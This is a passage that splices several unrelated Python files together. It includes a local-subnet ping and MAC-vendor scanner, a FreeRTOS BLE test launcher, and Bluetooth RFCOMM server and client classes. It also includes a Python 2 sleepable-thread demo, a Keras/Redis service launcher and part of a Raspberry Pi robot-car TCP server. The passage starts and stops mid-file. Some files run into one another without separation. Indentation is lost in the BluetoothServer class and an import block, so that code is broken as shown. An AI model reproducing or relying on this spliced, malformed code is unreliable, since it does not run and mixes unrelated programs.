            as Thread's ``group`` argument, which must be None and would raise
            for any other value.
        """
        super(ThreadFastScanIP, self).__init__()
        self.range_start = range_start
        self.range_end = range_end
        self.working_thread = True
        self.on_ips = []
        # Network prefix, e.g. '192.168.174.' from '192.168.174.1'.
        self.gatewayNT = gateway[:len(gateway) - len(gateway.split('.').pop())]

    def run(self):
        """Spawn one ping worker process per address and wait for them all."""
        self.jobs = []
        self.manager = Manager()
        # Manager dict so worker processes can share their results.
        self.on_ips = self.manager.dict()
        for count in range(self.range_start, self.range_end):
            ip = '%s%d' % (self.gatewayNT, count)
            if not self.working_thread:
                break
            p = Process(target=self.working, args=(ip, self.on_ips))
            self.jobs.append(p)
            p.start()
        for proc in self.jobs:
            proc.join()
            proc.terminate()

    def working(self, ip, lista):
        """Ping ``ip`` once; on success record its MAC/vendor in ``lista``."""
        with open(devnull, 'wb') as limbo:
            # ping exits 0 on success; -W 1 caps the wait at one second.
            result = Popen(['ping', '-c', '1', '-n', '-W', '1', ip],
                           stdout=limbo, stderr=limbo).wait()
        if not result:
            mac = self.get_mac(ip)  # look up once instead of three times
            if mac is None:
                lista[ip] = {'mac': '', 'vendor': ''}
            else:
                lista[ip] = {'mac': mac, 'vendor': self.resolver_mac(mac)}

    def get_mac(self, host):
        """Return ``host``'s MAC from the kernel ARP table, or None."""
        fields = popen('grep "%s" /proc/net/arp' % host).read().split()
        if len(fields) == 6 and fields[3] != '00:00:00:00:00:00':
            return fields[3]
        return None

    def resolver_mac(self, mac):
        """Resolve a MAC's vendor name via macvendors.co; '' on any failure."""
        MAC_URL = 'http://macvendors.co/api/%s'
        try:
            # Timeout so an unreachable API cannot hang a worker forever.
            r = requests.get(MAC_URL % mac.upper(), timeout=5)
            return r.json()['result']['company']
        except Exception:
            # Best-effort lookup: network/JSON errors degrade to no vendor.
            return ''

    def getOutput(self):
        """Return the shared results mapping (ip -> {'mac', 'vendor'})."""
        return self.on_ips

    def showoutput_table(self):
        """Print the scan results as a table; returns None."""
        keys = self.on_ips.keys()
        values = self.on_ips.values()
        data = {'IP': keys,
                'MAC': [v['mac'] for v in values],
                'VENDORS': [v['vendor'] for v in values]}
        print(tabulate(data, headers='keys'))
if __name__ == '__main__':
    # Scan the whole /24 around the gateway and print the result table.
    thread_scan = ThreadFastScanIP('192.168.174.1', 0, 255)
    thread_scan.start()
    thread_scan.join()
    # print(thread_scan.getOutput())
    # showoutput_table() prints the table itself and returns None, so calling
    # it inside print() (as before) emitted a spurious trailing "None".
    thread_scan.showoutput_table()
#
# FreeRTOS BLE HAL V2.0.0
# Copyright (C) 2020 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# http://aws.amazon.com/freertos
# http://www.FreeRTOS.org
#
#!/usr/bin/python
from __future__ import absolute_import, print_function, unicode_literals
from optparse import OptionParser, make_option
import dbus
import time
import dbus.mainloop.glib
import bleAdapter
try:
from gi.repository import GObject
except ImportError:
import gobject as GObject
import testutils
import startTests_afqp as startTests
import threading
import securityAgent
devices = {}
def backGroundEvents():
    """Run a GObject main loop to pump background events until interrupted.

    Intended to be used as a thread target; on Ctrl-C the loop is stopped
    and the function returns.
    """
    try:
        event_loop = GObject.MainLoop()
        event_loop.run()
    except KeyboardInterrupt:
        event_loop.quit()
        print("Thread: KeyboardInterrupt")
        return
if __name__ == '__main__':
    # Route D-Bus signals through the GLib main loop before any bus usage.
    dbus.mainloop.glib.DBusGMainLoop(set_as_default=True)
    # Start from a clean slate: forget any previously bonded peers.
    testutils.removeBondedDevices()
    #startBackGroundEvents = threading.Thread(target=backGroundEvents)
    # startBackGroundEvents.start()
    startTests.main()
from __future__ import unicode_literals
import socket
import sys
import errno
from .utils import (
register_spp,
get_mac,
get_adapter_powered_status,
get_adapter_discoverable_status,
get_adapter_pairable_status,
get_paired_devices,
device_pairable,
device_discoverable,
device_powered,
)
from .threads import WrapThread
BLUETOOTH_TIMEOUT = 0.01
class BluetoothAdapter(object):
    """
    Represents and allows interaction with a Bluetooth Adapter.

    The following example will get the Bluetooth adapter, print its powered status
    and any paired devices::

        a = BluetoothAdapter()
        print("Powered = {}".format(a.powered))
        print(a.paired_devices)

    :param str device:
        The Bluetooth device to be used, the default is "hci0", if your device
        only has 1 Bluetooth adapter this shouldn't need to be changed.
    """
    def __init__(self, device = "hci0"):
        self._device = device
        self._address = get_mac(self._device)
        self._pairing_thread = None

    @property
    def device(self):
        """
        The Bluetooth device name. This defaults to "hci0".
        """
        return self._device

    @property
    def address(self):
        """
        The `MAC address`_ of the Bluetooth adapter.

        .. _MAC address: https://en.wikipedia.org/wiki/MAC_address
        """
        return self._address

    @property
    def powered(self):
        """
        Set to ``True`` to power on the Bluetooth adapter.

        Depending on how Bluetooth has been powered down, you may need to use
        :command:`rfkill` to unblock Bluetooth to give permission to bluez to power on Bluetooth::

            sudo rfkill unblock bluetooth
        """
        return get_adapter_powered_status(self._device)

    @powered.setter
    def powered(self, value):
        device_powered(self._device, value)

    @property
    def discoverable(self):
        """
        Set to ``True`` to make the Bluetooth adapter discoverable.
        """
        return get_adapter_discoverable_status(self._device)

    @discoverable.setter
    def discoverable(self, value):
        device_discoverable(self._device, value)

    @property
    def pairable(self):
        """
        Set to ``True`` to make the Bluetooth adapter pairable.
        """
        return get_adapter_pairable_status(self._device)

    @pairable.setter
    def pairable(self, value):
        device_pairable(self._device, value)

    @property
    def paired_devices(self):
        """
        Returns a sequence of devices paired with this adapter
        :code:`[(mac_address, name), (mac_address, name), ...]`::

            a = BluetoothAdapter()
            devices = a.paired_devices
            for d in devices:
                device_address = d[0]
                device_name = d[1]
        """
        return get_paired_devices(self._device)

    def allow_pairing(self, timeout = 60):
        """
        Put the adapter into discoverable and pairable mode.

        :param int timeout:
            The time in seconds the adapter will remain pairable. If set to ``None``
            the device will be discoverable and pairable indefinitely.
        """
        # If a pairing thread is already running, stop it and restart.
        # Fix: is_alive is a method — the previous code tested the bound
        # method object (`.is_alive`), which is always truthy, so a finished
        # thread was also "stopped". Call it instead.
        if self._pairing_thread:
            if self._pairing_thread.is_alive():
                self._pairing_thread.stop()
        # make the adapter pairable
        self.pairable = True
        self.discoverable = True
        if timeout is not None:
            # start the pairing expiry thread
            self._pairing_thread = WrapThread(target=self._expire_pairing, args=(timeout, ))
            self._pairing_thread.start()

    def _expire_pairing(self, timeout):
        # Wait until the timeout elapses or the thread is stopped, then make
        # the adapter non-discoverable and non-pairable again.
        self._pairing_thread.stopping.wait(timeout)
        self.discoverable = False
        self.pairable = False
class BluetoothServer(object):
"""
Creates a Bluetooth server which will allow connections and accept incoming
RFCOMM serial data.
When data is received by the server it is passed to a callback function
which must be specified at initiation.
The following example will create a Bluetooth server which will wait for a
connection and print any data it receives and send it back to the client::
from bluedot.btcomm import BluetoothServer
from signal import pause
def data_received(data):
print(data)
s.send(data)
s = BluetoothServer(data_received)
pause()
:param data_received_callback:
A function reference should be passed, this function will be called when
data is received by the server. The function should accept a single parameter
which when called will hold the data received. Set to ``None`` if received
data is not required.
:param bool auto_start:
If ``True`` (the default), the Bluetooth server will be automatically started
on initialisation, if ``False``, the method ``start`` will need to be called
before connections will be accepted.
:param str device:
The Bluetooth device the server should use, the default is "hci0", if
your device only has 1 Bluetooth adapter this shouldn't need to be changed.
:param int port:
The Bluetooth port the server should use, the default is 1.
:param str encoding:
The encoding standard to be used when sending and receiving byte data. The default is
"utf-8". If set to ``None`` no encoding is done and byte data types should be used.
:param bool power_up_device:
If ``True``, the Bluetooth device will be powered up (if required) when the
server starts. The default is ``False``.
Depending on how Bluetooth has been powered down, you may need to use :command:`rfkill`
to unblock Bluetooth to give permission to bluez to power on Bluetooth::
sudo rfkill unblock bluetooth
:param when_client_connects:
A function reference which will be called when a client connects. If ``None``
(the default), no notification will be given when a client connects
:param when_client_disconnects:
A function reference which will be called when a client disconnects. If ``None``
(the default), no notification will be given when a client disconnects
"""
def __init__(self,
data_received_callback,
auto_start = True,
device = "hci0",
port = 1,
encoding = "utf-8",
power_up_device = False,
when_client_connects = None,
when_client_disconnects = None):
self._setup_adapter(device)
self._data_received_callback = data_received_callback
self._port = port
self._encoding = encoding
self._power_up_device = power_up_device
self._when_client_connects = when_client_connects
self._when_client_disconnects = when_client_disconnects
self._running = False
self._client_connected = False
self._server_sock = None
self._client_info = None
self._client_sock = None
self._conn_thread = None
if auto_start:
self.start()
@property
def device(self):
"""
The Bluetooth device the server is using. This defaults to "hci0".
"""
return self.adapter.device
@property
def adapter(self):
"""
A :class:`BluetoothAdapter` object which represents the Bluetooth device
the server is using.
"""
return self._adapter
@property
def port(self):
"""
The port the server is using. This defaults to 1.
"""
return self._port
@property
def encoding(self):
"""
The encoding standard the server is using. This defaults to "utf-8".
"""
return self._encoding
@property
def running(self):
"""
Returns a ``True`` if the server is running.
"""
return self._running
@property
def server_address(self):
"""
The `MAC address`_ of the device the server is using.
.. _MAC address: https://en.wikipedia.org/wiki/MAC_address
"""
return self.adapter.address
@property
def client_address(self):
"""
The `MAC address`_ of the client connected to the server. Returns
``None`` if no client is connected.
.. _MAC address: https://en.wikipedia.org/wiki/MAC_address
"""
if self._client_info:
return self._client_info[0]
else:
return None
@property
def client_connected(self):
"""
Returns ``True`` if a client is connected.
"""
return self._client_connected
@property
def data_received_callback(self):
"""
Sets or returns the function which is called when data is received by the server.
The function should accept a single parameter which when called will hold
the data received. Set to ``None`` if received data is not required.
"""
return self._data_received_callback
@data_received_callback.setter
def data_received_callback(self, value):
self._data_received_callback = value
@property
def when_client_connects(self):
"""
Sets or returns the function which is called when a client connects.
"""
return self._when_client_connects
@when_client_connects.setter
def when_client_connects(self, value):
self._when_client_connects = value
@property
def when_client_disconnects(self):
"""
Sets or returns the function which is called when a client disconnects.
"""
return self._when_client_disconnects
@when_client_disconnects.setter
def when_client_disconnects(self, value):
self._when_client_disconnects = value
def start(self):
"""
Starts the Bluetooth server if its not already running. The server needs to be started before
connections can be made.
"""
if not self._running:
if self._power_up_device:
self.adapter.powered = True
if not self.adapter.powered:
raise Exception("Bluetooth device {} is turned off".format(self.adapter.device))
#register the serial port profile with Bluetooth
register_spp(self._port)
#start Bluetooth server
#open the Bluetooth socket
self._server_sock = socket.socket(socket.AF_BLUETOOTH, socket.SOCK_STREAM, socket.BTPROTO_RFCOMM)
self._server_sock.settimeout(BLUETOOTH_TIMEOUT)
try:
self._server_sock.bind((self.server_address, self.port))
except (socket.error, OSError) as e:
if e.errno == errno.EADDRINUSE:
print("Bluetooth address {} is already in use - is the server already running?".format(self.server_address))
raise e
self._server_sock.listen(1)
#wait for client connection
self._conn_thread = WrapThread(target=self._wait_for_connection)
self._conn_thread.start()
self._running = True
def stop(self):
"""
Stops the Bluetooth server if its running.
"""
if self._running:
if self._conn_thread:
self._conn_thread.stop()
self._conn_thread = None
def send(self, data):
"""
Send data to a connected Bluetooth client
:param str data:
The data to be sent.
"""
if self._client_connected:
if self._encoding is not None:
data = data.encode(self._encoding)
try:
self._send_data(data)
except IOError as e:
self._handle_bt_error(e)
def _send_data(self, data):
"""
Send raw data to the client.
:param bytes data:
The data to be sent.
"""
self._client_sock.send(data)
def disconnect_client(self):
"""
Disconnects the client if connected. Returns `True` if a client was disconnected.
"""
if self._client_connected:
self._client_connected = False
# call the callback
if self.when_client_disconnects:
WrapThread(target=self.when_client_disconnects).start()
return True
else:
return False
def _setup_adapter(self, device):
self._adapter = BluetoothAdapter(device)
def _wait_for_connection(self):
#keep going until the server is stopped
while not self._conn_thread.stopping.is_set():
#wait for connection
self._client_connected = False
while not self._conn_thread.stopping.is_set():
try:
# accept() will timeout after BLUETOOTH_TIMEOUT seconds
self._client_sock, self._client_info = self._server_sock.accept()
self._client_connected = True
break
except socket.timeout as e:
self._handle_bt_error(e)
#did a client connect?
if self._client_connected:
#call the call back
if self.when_client_connects:
WrapThread(target=self.when_client_connects).start()
#read data
self._read()
#server has been stopped
self._server_sock.close()
self._server_sock = None
self._running = False
def _read(self):
#read until the server is stopped or the client disconnects
while self._client_connected:
#read data from Bluetooth socket
try:
data = self._client_sock.recv(1024, socket.MSG_DONTWAIT)
except IOError as e:
self._handle_bt_error(e)
data = b""
if data:
if self._data_received_callback:
if self._encoding:
data = data.decode(self._encoding)
self.data_received_callback(data)
if self._conn_thread.stopping.wait(BLUETOOTH_TIMEOUT):
break
#close the client socket
self._client_sock.close()
self._client_sock = None
self._client_info = None
self._client_connected = False
def _handle_bt_error(self, bt_error):
    """
    Classify an ``IOError`` raised by the Bluetooth socket and react:
    expected transient errors are ignored, disconnect-type errors drop
    the client, anything else is re-raised.
    """
    assert isinstance(bt_error, IOError)
    # accept() timeouts are routine - the connection loop polls
    if isinstance(bt_error, socket.timeout):
        return
    # EAGAIN: nothing in the buffer to read right now
    if bt_error.errno == errno.EAGAIN:
        return
    # ECONNRESET: client disconnected.  ETIMEDOUT: client unreachable
    # (perhaps out of range).  Either way, drop the connection.
    if bt_error.errno in (errno.ECONNRESET, errno.ETIMEDOUT):
        self.disconnect_client()
        return
    # anything else is unexpected
    raise bt_error
class BluetoothClient():
    """
    Creates a Bluetooth client which can send data to a server using RFCOMM Serial Data.

    The following example will create a Bluetooth client which will connect to a paired
    device called "raspberrypi", send "helloworld" and print any data it receives::

        from bluedot.btcomm import BluetoothClient
        from signal import pause
        def data_received(data):
            print(data)
        c = BluetoothClient("raspberrypi", data_received)
        c.send("helloworld")
        pause()

    :param str server:
        The server name ("raspberrypi") or server MAC address
        ("11:11:11:11:11:11") to connect to. The server must be a paired device.
    :param data_received_callback:
        A function reference should be passed, this function will be called when
        data is received by the client. The function should accept a single parameter
        which when called will hold the data received. Set to ``None`` if data
        received is not required.
    :param int port:
        The Bluetooth port the client should use, the default is 1.
    :param str device:
        The Bluetooth device to be used, the default is "hci0", if your device
        only has 1 Bluetooth adapter this shouldn't need to be changed.
    :param str encoding:
        The encoding standard to be used when sending and receiving byte data. The default is
        "utf-8". If set to ``None`` no encoding is done and byte data types should be used.
    :param bool power_up_device:
        If ``True``, the Bluetooth device will be powered up (if required) when the
        server starts. The default is ``False``.
        Depending on how Bluetooth has been powered down, you may need to use :command:`rfkill`
        to unblock Bluetooth to give permission to Bluez to power on Bluetooth::
            sudo rfkill unblock bluetooth
    :param bool auto_connect:
        If ``True`` (the default), the Bluetooth client will automatically try
        to connect to the server at initialisation, if ``False``, the
        :meth:`connect` method will need to be called.
    """
    def __init__(self,
                 server,
                 data_received_callback,
                 port = 1,
                 device = "hci0",
                 encoding = "utf-8",
                 power_up_device = False,
                 auto_connect = True):
        self._server = server
        self._data_received_callback = data_received_callback
        self._port = port
        self._power_up_device = power_up_device
        self._encoding = encoding
        self._setup_adapter(device)
        self._connected = False
        self._client_sock = None
        self._conn_thread = None
        if auto_connect:
            self.connect()

    @property
    def device(self):
        """
        The Bluetooth device the client is using. This defaults to "hci0".
        """
        return self.adapter.device

    @property
    def server(self):
        """
        The server name ("raspberrypi") or server `MAC address`_
        ("11:11:11:11:11:11") to connect to.

        .. _MAC address: https://en.wikipedia.org/wiki/MAC_address
        """
        return self._server

    @property
    def port(self):
        """
        The port the client is using. This defaults to 1.
        """
        return self._port

    @property
    def adapter(self):
        """
        A :class:`BluetoothAdapter` object which represents the Bluetooth
        device the client is using.
        """
        return self._adapter

    @property
    def encoding(self):
        """
        The encoding standard the client is using. The default is "utf-8".
        """
        return self._encoding

    @property
    def client_address(self):
        """
        The MAC address of the device being used.
        """
        return self.adapter.address

    @property
    def connected(self):
        """
        Returns ``True`` when connected.
        """
        return self._connected

    @property
    def data_received_callback(self):
        """
        Sets or returns the function which is called when data is received by the client.
        The function should accept a single parameter which when called will hold
        the data received. Set to ``None`` if data received is not required.
        """
        return self._data_received_callback

    @data_received_callback.setter
    def data_received_callback(self, value):
        self._data_received_callback = value

    def connect(self):
        """
        Connect to a Bluetooth server.
        """
        if not self._connected:
            if self._power_up_device:
                self.adapter.powered = True
            if not self.adapter.powered:
                raise Exception("Bluetooth device {} is turned off".format(self.adapter.device))
            # try to find the server name or MAC address in the paired
            # devices list; entries appear to be (mac, name) pairs - match
            # either field and keep the MAC
            server_mac = None
            for device in self.adapter.paired_devices:
                if self._server == device[0] or self._server == device[1]:
                    server_mac = device[0]
                    break
            # NOTE(review): `server_mac is None` would be the idiomatic
            # test, and a dedicated exception type would help callers;
            # left as-is to preserve behaviour.
            if server_mac == None:
                raise Exception("Server {} not found in paired devices".format(self._server))
            # create an RFCOMM socket bound to the local adapter
            self._client_sock = socket.socket(socket.AF_BLUETOOTH, socket.SOCK_STREAM, socket.BTPROTO_RFCOMM)
            self._client_sock.bind((self.adapter.address, self._port))
            self._client_sock.connect((server_mac, self._port))
            self._connected = True
            # read replies on a background thread
            self._conn_thread = WrapThread(target=self._read)
            self._conn_thread.start()

    def disconnect(self):
        """
        Disconnect from a Bluetooth server.
        """
        if self._connected:
            # stop the reader thread
            if self._conn_thread:
                self._conn_thread.stop()
                self._conn_thread = None
            # close the socket, always clearing state even if close() fails
            try:
                self._client_sock.close()
            finally:
                self._client_sock = None
                self._connected = False

    def send(self, data):
        """
        Send data to a Bluetooth server.

        :param str data:
            The data to be sent.
        """
        if self._connected:
            if self._encoding is not None:
                data = data.encode(self._encoding)
            try:
                self._send_data(data)
            except IOError as e:
                self._handle_bt_error(e)

    def _send_data(self, data):
        """
        Send raw data to the server.

        :param bytes data:
            The data to be sent.
        """
        self._client_sock.send(data)

    def _read(self):
        # Background reader: poll the socket until disconnected.
        while self._connected:
            # non-blocking read from the Bluetooth socket
            try:
                data = self._client_sock.recv(1024, socket.MSG_DONTWAIT)
            except IOError as e:
                self._handle_bt_error(e)
                data = b""
            if data:
                if self._data_received_callback:
                    if self._encoding:
                        data = data.decode(self._encoding)
                    self.data_received_callback(data)
            # stopping.wait() doubles as the poll delay; True means the
            # thread was asked to stop
            if self._conn_thread.stopping.wait(BLUETOOTH_TIMEOUT):
                break

    def _setup_adapter(self, device):
        # Bind this client to a specific local Bluetooth adapter.
        self._adapter = BluetoothAdapter(device)

    def _handle_bt_error(self, bt_error):
        # Classify socket errors: transient ones are ignored,
        # disconnect-type ones clear the connected flag, the rest re-raise.
        assert isinstance(bt_error, IOError)
        # 'resource unavailable' is when data cannot be read because there
        # is nothing in the buffer
        if bt_error.errno == errno.EAGAIN:
            pass
        # 'connection reset' is caused when the server disconnects
        elif bt_error.errno == errno.ECONNRESET:
            self._connected = False
        # 'connection timeout' is caused when the client can no longer
        # reach the server (perhaps it has gone out of range)
        elif bt_error.errno == errno.ETIMEDOUT:
            self._connected = False
        else:
            raise bt_error
|
SleepableThread.py | import threading
import time
import os
from termcolor import colored
class SleepableThread(threading.Thread):
    """
    A worker thread driven by a small state machine.

    thread_state values: 0 = not created, 1 = created/ready, 2 = running,
    3 = sleeping, 4 = ended.  The run() loop polls thread_state every 5
    seconds; "sleeping" and "stopping" are cooperative, not preemptive.

    NOTE(review): although this subclasses threading.Thread, it spawns a
    *separate* inner Thread (self.thread) targeting self.run; the
    inherited thread object itself is never started.  Python 2 syntax.
    """
    def __init__(self):
        super(SleepableThread, self).__init__()
        self.create_thread()
        self.start_thread()
    # class-level defaults, shadowed by instance attributes once assigned
    thread = None            # the inner worker Thread object
    thread_pid = ''          # ident of the inner thread once started
    thread_spawn_count = 0   # how many inner threads have been created
    thread_state = 0         # state-machine value, see class docstring
    def create_thread(self):
        # Build a fresh (not yet started) worker thread; state -> READY.
        print ' Creating thread.'
        self.thread_spawn_count += 1
        self.thread = threading.Thread(target=self.run, name='thread_{}'.format(self.thread_spawn_count), args=())
        self.thread_pid = 'None'
        self.thread_state = 1
    def start_thread(self):
        # READY -> RUNNING; any other state just reports why it can't start.
        if self.thread_state == 1:
            print ' Starting thread.'
            self.thread.start()
            self.thread_pid = self.thread.ident
            self.thread_state = 2
        elif self.thread_state == 2:
            print ' The thread has already started.'
        elif self.thread_state == 3:
            print ' The thread has already started and is currently asleep.'
        elif self.thread_state == 4:
            print ' The thread is ended. Try restarting the thread.'
    def sleep_thread(self):
        # RUNNING -> SLEEPING (cooperative: run() notices on its next poll).
        if self.thread_state == 1:
            print ' The thread has not started yet.'
        elif self.thread_state == 2:
            print ' Sleeping thread.'
            self.thread_state = 3
        elif self.thread_state == 3:
            print ' The thread is already sleeping.'
        elif self.thread_state == 4:
            print ' The thread has already ended.'
    def wake_thread(self):
        # SLEEPING -> RUNNING.
        if self.thread_state == 1:
            print ' The thread has not started yet.'
        elif self.thread_state == 2:
            print ' The thread is running and not sleeping.'
        elif self.thread_state == 3:
            print ' Waking thread.'
            self.thread_state = 2
        elif self.thread_state == 4:
            print ' The thread has already ended.'
    def stop_thread(self):
        # RUNNING/SLEEPING -> ENDED (run() exits on its next poll).
        if self.thread_state == 1:
            print ' The thread has not started yet.'
        elif self.thread_state == 2 or self.thread_state == 3:
            print ' Stopping thread.'
            self.thread_state = 4
        elif self.thread_state == 4:
            print ' The thread has already ended.'
    def restart_thread(self):
        # Stop (if needed), give the worker a moment to exit, then
        # create and start a brand-new inner thread.
        if self.thread_state == 2 or self.thread_state == 3:
            self.stop_thread()
            time.sleep(0.5)
        if self.thread_state == 4:
            self.create_thread()
        if self.thread_state == 1:
            self.start_thread()
    def thread_status(self):
        # Human-readable, colourised state label for the terminal UI.
        if self.thread_state == 1:
            return colored('READY', 'yellow')
        elif self.thread_state == 2:
            return colored('RUNNING', 'green')
        elif self.thread_state == 3:
            return colored('SLEEPING', 'yellow')
        elif self.thread_state == 4:
            return colored('ENDED', 'red')
    def run(self):
        # Worker loop: print a heartbeat every 5s until state hits ENDED.
        while self.thread_state != 4:
            if self.thread_state == 3:
                while self.thread_state == 3:
                    print 'Sleeping'
                    time.sleep(5)
            else:
                print 'Running'
                time.sleep(5)
    def parse_thread_command(self, cmd):
        # Map a text command (with aliases) onto the state-machine methods.
        cmd = cmd.lower()
        if cmd == 'create':
            self.create_thread()
        elif cmd == 'start' or cmd == 'begin':
            self.start_thread()
        elif cmd == 'sleep':
            self.sleep_thread()
        elif cmd == 'wake':
            self.wake_thread()
        elif cmd == 'stop' or cmd == 'end' or cmd == 'kill':
            self.stop_thread()
        elif cmd == 'restart':
            self.restart_thread()
    def terminal(self):
        # Interactive console loop; 'c' clears the screen (Windows 'cls').
        while True:
            print 'Thread {}({}) spawn count: '.format(self.thread.name, self.thread.ident), self.thread_spawn_count, \
                ' | Thread state: ', self.thread_state, ' | ', self.thread_status()
            cmd = raw_input('Enter command: ')
            if cmd == 'create':
                self.create_thread()
            elif cmd == 'start':
                self.start_thread()
            elif cmd == 'sleep':
                self.sleep_thread()
            elif cmd == 'wake':
                self.wake_thread()
            elif cmd == 'stop':
                self.stop_thread()
            elif cmd == 'restart':
                self.restart_thread()
            elif cmd == 'c':
                os.system('cls')
            else:
                pass
if __name__ == "__main__":
    # Interactive demo: spawn a worker thread and drive it from the console.
    t = SleepableThread()
    t.terminal()
|
__init__.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# 2020, Jan Cervenka
import redis
import multiprocessing as mp
from .app import create_app
from .backend import RequestProcessor
from .constants import (REDIS_HOST, REDIS_PORT,
DEFAULT_SERVICE_HOST, DEFAULT_SERIVCE_PORT)
def run_app(args):
    """
    Run the web API frontend.

    :param args: parsed CLI arguments; only ``args.debug`` is read here.
    """
    frontend = create_app(
        redis_host=REDIS_HOST,
        redis_port=REDIS_PORT)
    # NOTE: DEFAULT_SERIVCE_PORT is the constant's actual (misspelled) name.
    frontend.run(
        host=DEFAULT_SERVICE_HOST,
        port=DEFAULT_SERIVCE_PORT,
        debug=args.debug)
def run_backend(args):
    """
    Run the request-processing backend.

    Loads the Keras model from the path in ``args.model``, connects to
    Redis, and processes requests until terminated.
    """
    # imported lazily so the frontend process never pays the TF import cost
    from tensorflow.keras.models import load_model

    keras_model = load_model(args.model)
    redis_db = redis.StrictRedis(host=REDIS_HOST, port=REDIS_PORT, db=0)
    RequestProcessor(db=redis_db, model=keras_model).run()
def run_service(args):
    """
    Launch the backend and the API frontend as two separate processes.

    Neither process is joined; this function returns immediately after
    spawning them.
    """
    # backend first, then the frontend that feeds it
    for entry_point in (run_backend, run_app):
        mp.Process(target=entry_point, args=(args,)).start()
|
server.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
import io
import socket
import struct
import time
import picamera
import fcntl
import sys
import threading
from Motor import *
from servo import *
from Led import *
from Buzzer import *
from ADC import *
from Thread import *
from Light import *
from Ultrasonic import *
from Line_Tracking import *
from threading import Timer
from threading import Thread
from Command import COMMAND as cmd
class Server:
    """
    TCP control/video server for a Raspberry Pi robot car.

    Two listening sockets are used: port 5000 carries text commands
    (readdata/send) and port 8000 streams JPEG frames from the Pi camera
    (sendvideo).  Commands are '#'-separated fields terminated by a
    newline -- see the cmd.CMD_* constants.
    """
    def __init__(self):
        # hardware helpers
        self.PWM=Motor()
        self.servo=Servo()
        self.led=Led()
        self.ultrasonic=Ultrasonic()
        self.buzzer=Buzzer()
        self.adc=Adc()
        self.light=Light()
        self.infrared=Line_Tracking()
        self.tcp_Flag = True     # while True, readdata auto-reconnects via Reset()
        self.sonic=False         # periodic ultrasonic reporting enabled
        self.Light=False         # periodic light-sensor reporting enabled
        self.Mode = 'one'        # current drive mode ('one'..'four')
        self.endChar='\n'        # protocol message terminator
        self.intervalChar='#'    # protocol field separator
    def get_interface_ip(self):
        # Return wlan0's IPv4 address via the SIOCGIFADDR (0x8915) ioctl;
        # bytes 20:24 of the returned ifreq hold the packed address.
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        return socket.inet_ntoa(fcntl.ioctl(s.fileno(),
            0x8915,
            struct.pack('256s',b'wlan0'[:15])
            )[20:24])
    def StartTcpServer(self):
        # Open the command socket (5000) and the video socket (8000).
        HOST=str(self.get_interface_ip())
        self.server_socket1 = socket.socket()
        self.server_socket1.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEPORT,1)
        self.server_socket1.bind((HOST, 5000))
        self.server_socket1.listen(1)
        self.server_socket = socket.socket()
        self.server_socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEPORT,1)
        self.server_socket.bind((HOST, 8000))
        self.server_socket.listen(1)
        print('Server address: '+HOST)
    def StopTcpServer(self):
        # Best-effort close of both client connections.
        try:
            self.connection.close()
            self.connection1.close()
        except Exception as e:
            print ('\n'+"No client connection")
    def Reset(self):
        # Tear down, re-listen, and spawn fresh video/command threads.
        self.StopTcpServer()
        self.StartTcpServer()
        self.SendVideo=Thread(target=self.sendvideo)
        self.ReadData=Thread(target=self.readdata)
        self.SendVideo.start()
        self.ReadData.start()
    def send(self,data):
        # Send a UTF-8 encoded message on the command connection.
        self.connection1.send(data.encode('utf-8'))
    def sendvideo(self):
        # Accept one video client, then stream length-prefixed JPEG frames
        # until the connection breaks.
        try:
            self.connection,self.client_address = self.server_socket.accept()
            self.connection=self.connection.makefile('wb')
        except:
            pass
        # single-client server: stop listening once connected
        self.server_socket.close()
        try:
            with picamera.PiCamera() as camera:
                camera.resolution = (400,300) # pi camera resolution
                camera.framerate = 15         # 15 frames/sec
                time.sleep(2)                 # give 2 secs for camera to initialize
                start = time.time()
                stream = io.BytesIO()
                # send jpeg format video stream
                print ("Start transmit ... ")
                for foo in camera.capture_continuous(stream, 'jpeg', use_video_port = True):
                    try:
                        self.connection.flush()
                        stream.seek(0)
                        b = stream.read()
                        length=len(b)
                        # skip absurdly large frames
                        if length >5120000:
                            continue
                        # frame is prefixed with its byte length
                        # NOTE(review): struct 'L' in native mode is
                        # platform-sized; the client must match.
                        lengthBin = struct.pack('L', length)
                        self.connection.write(lengthBin)
                        self.connection.write(b)
                        stream.seek(0)
                        stream.truncate()
                    except Exception as e:
                        print(e)
                        print ("End transmit ... " )
                        break
        except:
            # camera not installed / not available
            pass
    def stopMode(self):
        # Kill whichever autonomous-mode thread is running and stop the
        # motors; each block is best-effort because the thread attribute
        # may not exist.
        try:
            stop_thread(self.infraredRun)
            self.PWM.setMotorModel(0,0,0,0)
        except:
            pass
        try:
            stop_thread(self.lightRun)
            self.PWM.setMotorModel(0,0,0,0)
        except:
            pass
        try:
            stop_thread(self.ultrasonicRun)
            self.PWM.setMotorModel(0,0,0,0)
            # recentre the camera servos
            self.servo.setServoPwm('0',90)
            self.servo.setServoPwm('1',90)
        except:
            pass
    def readdata(self):
        # Accept one command client and dispatch newline-terminated,
        # '#'-separated commands until the connection drops.
        try:
            try:
                self.connection1,self.client_address1 = self.server_socket1.accept()
                print ("Client connection successful !")
            except:
                print ("Client connect failed")
            restCmd=""
            # single-client server: stop listening once connected
            self.server_socket1.close()
            while True:
                try:
                    # prepend any partial command left from the last read
                    AllData=restCmd+self.connection1.recv(1024).decode('utf-8')
                except:
                    if self.tcp_Flag:
                        self.Reset()
                    break
